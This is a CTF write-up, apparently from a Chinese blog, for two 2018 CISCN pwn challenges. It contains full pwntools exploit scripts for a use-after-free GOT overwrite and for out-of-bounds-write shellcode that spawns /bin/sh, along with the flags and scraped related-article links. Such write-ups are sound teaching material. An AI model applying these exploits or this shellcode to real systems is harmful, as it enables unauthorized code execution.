前言

2018全国大学生网络安全竞赛 ,做了2 道题

task_supermarket

change_desc 里面调用 realloc 会触发 uaf

利用 uaf 修改 obj->desc_ptratoi@got , 泄露 libc, 使用 libc-database 找到相应的 libc

修改 atoi@gotsystem ,然后 输入 sh , getshell



from pwn import *

from time import sleep

context(os='linux', log_level='info')

context.terminal = ['tmux', 'splitw', '-h']

# p = process("./task_supermarket")

p = remote("117.78.43.197", 32138)

def add(name, price, descrip_size, description):

    sleep(0.2)

    p.recvuntil("your choice>> ")

    p.sendline('1')

    p.recvuntil("name:")

    sleep(0.2)

    p.sendline(name)

    p.recvuntil("price:")

    sleep(0.2)

    p.sendline(str(price))

    p.recvuntil("descrip_size:")

    sleep(0.2)

    p.sendline(str(descrip_size))

    p.recvuntil("description:")

    sleep(0.1)

    p.send(description)

def free(name):

    p.recvuntil("your choice>> ")

    p.sendline('2')

    p.recvuntil("name:")

    sleep(0.2)

    p.sendline(name)   

def list():

    p.recvuntil("your choice>> ")

    p.sendline('3')

def change_price(name,  value):

    p.recvuntil("your choice>> ")

    p.sendline('4')

    p.recvuntil("name:")

    p.sendline(name)

    p.recvuntil("input the value you want to cut or rise in:")

    p.sendline(str(value))

def change_desc(name, descrip_size, description):

    p.recvuntil("your choice>> ")

    p.sendline('5')

    p.recvuntil("name:")

    sleep(0.2)

    p.sendline(name)

    p.recvuntil("descrip_size:")

    sleep(0.2)

    p.sendline(str(descrip_size))

    p.recvuntil("description:")

    sleep(0.2)

    p.send(description)

add('0', 80, 0x1c, '\n')

add('1', 80, 0x1c, '\n')

add('2', 80, 0x1c, '\n')

add('3', 80, 0x1c, '\n')

change_desc('1', 0x30, '\n')

add('4', 80, 0x1c, '\n')

add('5', 80, 0x80, '\n')

read_got = 0x0804B010

atoi_got = 0x0804B048

payload = p32(0x34)

payload += p32(0) * 3

payload += p32(0x50)

payload += '\x90\n'

change_desc('1', 0x1c, payload)

payload = '\x00' * (0x20 - 8)

payload += p32(0)

payload += p32(0x21)

payload += p32(0x35)

payload += p32(0) * 3

payload += p32(0x50)

payload += p32(0x90)

payload += p32(atoi_got)

change_desc('4', 0x90, payload + '\n')

list()

p.recvuntil("5: price.80, des.")

libc = ELF("/home/haclh/workplace/libc-database/db/libc6-i386_2.23-0ubuntu9_amd64.so")

leak = u32(p.recv(4))

libc.address = leak - libc.symbols['atoi']

info("libc: " + hex(libc.address))

info("leak: " + hex(leak))

payload = p32(libc.symbols['system'])

change_desc('5', 0x90, payload + '\n')

# gdb.attach(p)

# pause()

p.recvuntil("your choice>> ")

p.sendline("sh")

p.interactive()

flag: ciscn{1beba07b6a3232220b92429c6a0ac1e4}

task_note_service2

add 的时候会越界。

程序没开 nx, 利用越界改 exit@got 为 堆地址,然后布置 shellcode , 由于严格控制大小。使用 短跳转 连接各条 shellcode 需要的语句。用到的 shellcode 为

xor esi, esi

push rsi

push rsi

mov  ebx, 0x6e69622f

mov [rsp], ebx

mov  ebx, 0x68732f2f

mov [rsp+4], ebx

mov rdi, rsp

push 0x3b

pop rax

xor rdx,rdx

syscall

最终 exp

from pwn import *

from time import sleep

context(os='linux', log_level='debug')

context.terminal = ['tmux', 'splitw', '-h']

# p = process("./task_note_service2")

p = remote("49.4.23.165", 32510)

base = 0x555555554000

def add(idx, content):

    sleep(0.2)

    p.recvuntil("your choice>> ")

    p.sendline('1')

    p.recvuntil("index:")

    sleep(0.2)

    p.sendline(str(idx))

    p.recvuntil("size:")

    sleep(0.2)

    p.sendline(str(len(content)))

    p.recvuntil("content:")

    sleep(0.2)

    p.send(content)

def free(idx):

    p.recvuntil("your choice>> ")

    p.sendline('2')

    p.recvuntil("index:")

    sleep(0.2)

    p.sendline(str(idx))

gdb_command = '''

x/20xg {}

break *0x0000555555757030

c

'''.format(hex(base + 0x2020A0))

add(-7, '\x90\x31\xf6\x56\x56\xeb\x19\n')  # exit ---> shellocde

add(0,  '\xbb\x2f\x62\x69\x6e\xeb\x19\n')  # push

add(1,  '\x90\x90\x89\x1c\x24\xeb\x19\n')  # push

add(2,  '\xbb\x2f\x2f\x73\x68\xeb\x19\n')  # push

add(3,  '\x89\x5c\x24\x04\x90\xeb\x19\n')  # push

add(4,  '\x48\x89\xe7\x6a\x3b\xeb\x19\n')  # push

add(5,  '\x58\x48\x31\xd2\x0f\x05\n')  # push

# gdb.attach(p, gdb_command)

# pause()

p.recvuntil("your choice>>")

p.sendline("5")

p.interactive()

'''

xor esi, esi

push rsi

push rsi

mov  ebx, 0x6e69622f

mov [rsp], ebx

mov  ebx, 0x68732f2f

mov [rsp+4], ebx

mov rdi, rsp

push 0x3b

pop rax

xor rdx,rdx

syscall

'''

flag: ciscn{133fb0f0ca3ddf24964975f1ab94d082}

ciscn2018-pwn-wp的更多相关文章

  1. 2021能源PWN wp

    babyshellcode 这题考无write泄露,write被沙盒禁用时,可以考虑延时盲注的方式获得flag,此exp可作为此类型题目模版,只需要修改部分参数即可,详细见注释 from pwn im ...

  2. bugku - pwn wp

    一. PWN1 题目:nc 114.116.54.89 10001 1.  直接kali里面跑nc 2.ls看看有啥 3.明显有一个flag cat查看一下 搞定 二 . PWN2 题目:给了nc 1 ...

  3. 【pwn】攻防世界 pwn新手区wp

    [pwn]攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了. 1.get_sh ...

  4. BUUCTF PWN部分题目wp

    pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda ...

  5. CG-CTF pwn部分wp

    面向pwn刷cgctfPWN1,When did you born题目给了一个ELF文件,和一个.C文件先运行ELF,大概如下What’s Your Birth?0What’s Your Name?0 ...

  6. (buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016

    [buuctf]pwn入门 pwn学习之路引入 栈溢出引入 test_your_nc [题目链接] 注意到 Ubuntu 18, Linux系统 . nc 靶场 nc node3.buuoj.cn 2 ...

  7. pwn学习之四

    本来以为应该能出一两道ctf的pwn了,结果又被sctf打击了一波. bufoverflow_a 做这题时libc和堆地址都泄露完成了,卡在了unsorted bin attack上,由于delete ...

  8. Pwn入坑指南

    栈溢出原理 参考我之前发的一篇 Windows栈溢出原理 还有 brant 师傅的<0day安全笔记> Pwn常用工具 gdb:Linux下程序调试 PEDA:针对gdb的python漏洞 ...

  9. Pwn with File结构体(一)

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 利用 FILE 结构体进行攻击,在现在的 ctf 比赛中也经常出现 ...

  10. 安恒月赛WP

    一月 一叶飘零大佬的WP:安恒月赛一月 二进制部分:zjgcjy大佬的WP reverse1更容易理解的一种解法 pwn1详解 二月 一叶飘零WP 二进制部分: reverse Pwn 三月 ...

随机推荐

  1. django 的ajax 请求,使用form的验证机制。

    所有的form都需要在后台验证,前台验证是不可靠的,django的验证是后台验证,前台提示错误信息. js验证是在前台的,无需发送消息给后台,但安全性不可靠,强调的是用户体验. 要求,使用弹出框,弹出 ...

  2. J02-Java IO流总结二 《概述》

    1  流的概念 流是一个信息的通道,通过通道可以访问通道连接的文件对象. 2  流的分类 根据流中数据的流向,可分为输入流和输出流 输入流:从其他的地方流入到程序内存中的,比如InputStream. ...

  3. MapReduce求最大值最小值问题

    import java.io.File; import java.io.IOException; import org.apache.hadoop.conf.Configuration; import ...

  4. java8新特性-入门摘要

    本文是针对java8做的入门摘要笔录,详细分析可参见如下原文. 原文地址 http://www.javacodegeeks.com/2013/02/java-8-from-permgen-to-met ...

  5. IDEA Community(社区版)再谈之无奈之下还是去安装旗舰版

    不多说,直接上干货! 前言 相信很多人,跟我一样,一开始,接触spark,肯定会首选IntelliJ IDEA的社区版Community. IntelliJ IDEA号称当前Java开发效率最高的ID ...

  6. Javac之glb与lub

    5.1.10. Capture Conversion Let G name a generic type declaration (§8.1.2, §9.1.2) with n type parame ...

  7. Redis笔记(七):Redis应用场景

    特性优势 1 支持持久化 Redis支持数据的持久化,可以将内存中的数据保存在磁盘中,重启的时候可以再次加载进行使用. 2 数据类型丰富 Redis不仅仅支持简单的key-value类型的数据,同时还 ...

  8. java学习-AES加解密之AES-128-CBC算法

    AES算法简介 AES是一种对称加密算法,或称分组对称加密算法.  是Advanced Encryption Standard高级加密标准,简称AES AES的基本要求是,采用对称分组密码体制.分组密 ...

  9. JVM内存限制和调整

    今天用java -jar执行一个jar文件提示内存不够,需要设置虚拟机的堆大小.以下是参考资料: 堆(Heap)和非堆(Non-heap)内存  按照官方的说法:“Java 虚拟机具有一个堆,堆是运行 ...

  10. [PY3]——Queue

    Queue class Queue(builtins.object) __init__(self, maxsize=0) empty(self) full(self) get(self, block= ...